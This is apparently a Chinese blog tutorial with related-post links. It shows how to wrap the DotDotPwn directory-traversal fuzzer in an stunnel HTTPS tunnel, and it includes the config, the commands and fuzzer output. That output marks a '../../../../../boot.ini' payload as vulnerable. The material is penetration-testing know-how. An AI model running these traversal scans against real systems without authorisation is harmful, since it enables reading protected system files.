DotDotPwn的https模式

最新推荐文章于 2024-03-18 09:32:14 发布
最新推荐文章于 2024-03-18 09:32:14 发布
阅读量206 收藏
点赞数
分类专栏: web kali 信息收集 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_16188/article/details/82608556
版权
web 同时被 3 个专栏收录
63 篇文章 0 订阅
订阅专栏
kali
58 篇文章 1 订阅
订阅专栏
信息收集
32 篇文章 0 订阅
订阅专栏
参考:
[url]http://www.spentera.com/2012/03/directory-traversal-with-dotdotpwn-https-mode/[/url]
[url]https://www.stunnel.org/howto.html[/url]

使用stunnel程序,stunnel参考[url]https://www.stunnel.org/index.html[/url]
stunnel是kali默认程序
可以通过[url]https://www.stunnel.org/downloads.html[/url]页面下载安装
[b]生成二进制文件:[/b] 
1. wget https://www.stunnel.org/downloads/stunnel-5.07.tar.gz
2. tar vxf stunnel-5.07.tar.gz
3. cd stunnel-5.07/
4. ./configure
5. make
6. make install


[b]生成SSL pem文件[/b] 
root@kali:~# openssl req -new -x509 -days 365 -nodes -out stunnel.pem -keyout stunnel.pem


[b]配置参数:[/b] 
root@kali:~# cat stunnel.conf
cert = /root/stunnel.pem
#Some security enhancements for UNIX systems - comment them out on Win32
client = yes
#options=NO_SSLv2
debug = 5

; Service-level configuration
[https]
accept = 127.0.0.1:8080
connect = 206.190.36.45:443

[color=red][b][注意]此处使用的206.190.36.45是yahoo的ip,实际环境中需要替换成需要的IP。[/b][/color]

[b]运行stunnel[/b] 
bash-3.2# stunnel /opt/local/etc/stunnel/stunnel.conf

如果没有错误,则没有任何log显示

验证HTTPS协议: 
root@kali:~# nc 127.0.0.1 8080
GET / HTTP/1.1
Host:yahoo.com

HTTP/1.1 301 Redirect
Date: Wed, 05 Nov 2014 14:24:54 GMT
Via: http/1.1 ir8.fp.gq1.yahoo.com (ApacheTrafficServer)
Server: ATS
Location: https://www.yahoo.com/
Content-Type: text/html
Content-Language: en
Cache-Control: no-store, no-cache
Connection: keep-alive
Content-Length: 1450


[b]然后就可以进行dotdotpwn测试:[/b] 
bash-3.2# perl dotdotpwn.pl -m http-url -h 127.0.0.1 -x 8080 -O -s -u http://127.0.0.1:8080/cms/print.php?page=TRAVERSAL -k WINDOWS -b -q

[+] Report name: Reports/127.0.0.1_03-18-2012_23-59.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: 127.0.0.1
[+] Detecting Operating System (nmap) ...
[+] Operating System detected: 
[+] Protocol: http
[+] Port: 8080
[+] Service detected:
Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 14640

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Replacing "TRAVERSAL" with the traversals created and sending
. . 
[*] Testing URL: http://127.0.0.1:8080/cms/print.php?page=../../../../../boot.ini <== VULNERABLE

[+] Fuzz testing finished after 0.08 minutes (5 seconds)
[+] Total Traversals found: 1
[+] Report saved: Reports/127.0.0.1_03-18-2012_23-59.txt
iteye_16188
关注
专栏目录
网安工具 | Windows便携式渗透测试环境PentestBox入门到进阶使用指南
WeiyiGeek 唯一极客IT知识分享
09-26 428
描述: PentestBox是一个基于Windows的便携式渗透测试环境, 它基于ConEmu 和 cmder进行设计的。它包含了许多常用的渗透测试工具和应用程序,如等。PentestBox的设计初衷是为了方便渗透测试人员在Windows系统上进行测试,无需进行复杂的安装和配置。它可以直接从USB驱动器或其他便携设备上运行,而不会对主机系统产生任何影响, PentestBox还提供了图形用户界面,使得渗透测试工作更加简单和直观。
nethunter自带 kali-tools-web更新
wjwqp的专栏
02-03 802
!](https://img-blog.csdnimg.cn/b1994459bedfd0 Hit:1 http://mirrors.neusoft.edu.cn/kali kali-rolling 在这里插入图片描述 graph TD; A-->B; B-->C; ![在这里插入图片描述](https://img-blog.csdnimg.cn/7affff8511d94f2da5b1c66dd0eed94a.png?x-oss-process=image/watermark,type_d
dotdotpwnDotDotPwn-目录遍历模糊器
02-05
dotdotpwnDotDotPwn-目录遍历模糊器
dotdotpwn
iteye_16188的博客
11-04 233
参考:[url]https://media.blackhat.com/bh-us-11/Arsenal/BH_US_11_Nitrous_DotDotPwn_Slides.pdf[/url] [b]概述:[/b] dotdotpwn是一个只能的灵活的模糊测试器,用来测试web/ftp/tftp中的目录遍历漏洞。web平台包括CMS,ERP,Blog等。同时它含有一个协议独立的模块用来向指定的主...
DotDotPwn使用教程
时光途径
04-01 1523
title: DotDotPwn categories: Information Gathering tags: [kali linux,dotdotpwn,information gathering,recon,http,exploitation tools] date: 2016-10-22 14:00:00 0x00 DotDotPwn介绍 DotDotPwn是一个非常灵活的智能模糊...
探索安全漏洞:dotdotpwn
最新发布
gitblog_00048的博客
03-18 363
探索安全漏洞:dotdotpwn dotdotpwnDotDotPwn - The Directory Traversal Fuzzer项目地址:https://gitcode.com/gh_mirrors/do/dotdotpwn dotdotpwn 是一个自动化工具,用于检测 Web 应用程序中的路径遍历漏洞。这个工具可以扫描你的应用程序,并寻找任何可能的路径遍历攻击。如果你是一个开发者或者...
目录遍历工具DotDotPwn安装使用
weixin_43487849的博客
06-01 1419
1. DotDotPwn介绍 DotDotPwn是一个模糊测试工具,用于发现软件中的遍历目录漏洞,例如HTTP/FTP/TFTP服务器,Web平台的应用程序(如CMS,ERP,博客等)。 DotDotPwn是用perl编程语言编写的,可以在LNIX或Windows平台下运行。 2. DotDotPwn安装 1.需要perl环境,有的系统自带,可使用perl -v查看,若没有直接到官网下载安装: https://www.perl.org/get.html 2. 下载工具:https://github.com/
分享国外安全团队及工具
专注企业信息安全-sec
03-19 1万+
名称 版 描述 主页 0trace 1.5 跳跃枚举工具 http://jon.oberheide.org/0trace/ 3proxy 0.7.1.1 微小的免费代理服务器。 http://3proxy.ru/ 3proxy-win32的 0.7.1....
burpsuite练兵场
09-12
对于Burp Suite来说,练兵场是指用于测试和演示Burp Suite功能的虚拟环境。它可以帮助用户熟悉Burp Suite...如果您对自动利用工具感兴趣,引用提到了一个名为dotdotpwn的工具,可以作为您进一步了解和使用的补充资料。
[译]dotdotpwn使用
iteye_16188的博客
11-05 458
原文地址:https://github.com/wireghoul/dotdotpwn/blob/master/EXAMPLES.txt [b]= HTTP Module[/b] [code="java"]./dotdotpwn.pl -m http -h 192.168.1.1 -x 8080 -f /etc/hosts -k "localhost" -d 8 -t 200 -s[/...
git遇到的诡异错误: Failed connect to github.com:443
热门推荐
hustsselbj的专栏
07-11 10万+
为什么会说Failed connect to github.com:443是一个诡异的问题?乍一看,写明了无法连接到github.com,ping也不通,但是获取到了github的IP(192.30.252.131),而且ping其他网站如baidu.com是通的。更让人意想不到的是网关可以git,但是本机却不能git。然后就陷入了挣扎中。。。 iptables挣扎: 停掉本机iptables
解决 Failed to connect to github.com port 443:connection timed out
Lin_QC的博客
05-08 2万+
使用git clone时卡住,之后报错 Failed to connect to github.com port 443: connection timed out 将ubuntu上的代理软件关闭 一切正常 如果还是卡住,试着删除一下代理配置,这篇文章里有 https://blog.csdn.net/Lin_QC/article/details/88966839 ...
目录遍历漏洞小结
iteye_16188的博客
11-04 332
1. 首先使用dotdotpwn发现漏洞 2. 如果存在,则使用Panoptic搜集有用信息
[译]nmap绕过防火墙
iteye_16188的博客
10-17 4919
原文地址:http://resources.infosecinstitute.com/nmap-evade-firewall-scripting/ [color=blue]TCP ACK Scan (-sA)[/color] 发送ACK数据报比发送SYN数据包更好,因为如果远端主机存在主动防火墙,那么由于防火墙对于ACK数据报不产生log,因为防火墙把ACK数据包当成SYN数据包的应答。TCP...
nslookup用ip查域名
iteye_16188的博客
08-29 2690
在一次信息侦查中发现,可以使用nslookup来反向确认域名服务器(不是所有的都好使)。 root@kali:~# nslookup > [color=red]ip_addr[/color] Server: 192.168.59.2 Address: 192.168.59.2#53 Non-authoritative answer: [color=re...
kali破解pdf密码
iteye_16188的博客
08-28 1299
1. apt-get install pdfcrack 2. pdfcrack --help pdfcrack -f filename [OPTIONS]
kali更新exploit-db
iteye_16188的博客
12-12 1263
[code="java"]cd /usr/share/exploitdb wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjf archive.tar.bz2 rm archive.tar.bz2[/code]
Kali中使用nslookup
iteye_16188的博客
10-23 1182
支持下面的记录类型: - SOA : Start of Authority. Defines the zone name, an e-mail contact and various time and refresh values applicable to the zone. - A : the IPv4 address that belongs to machine name - AAA...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值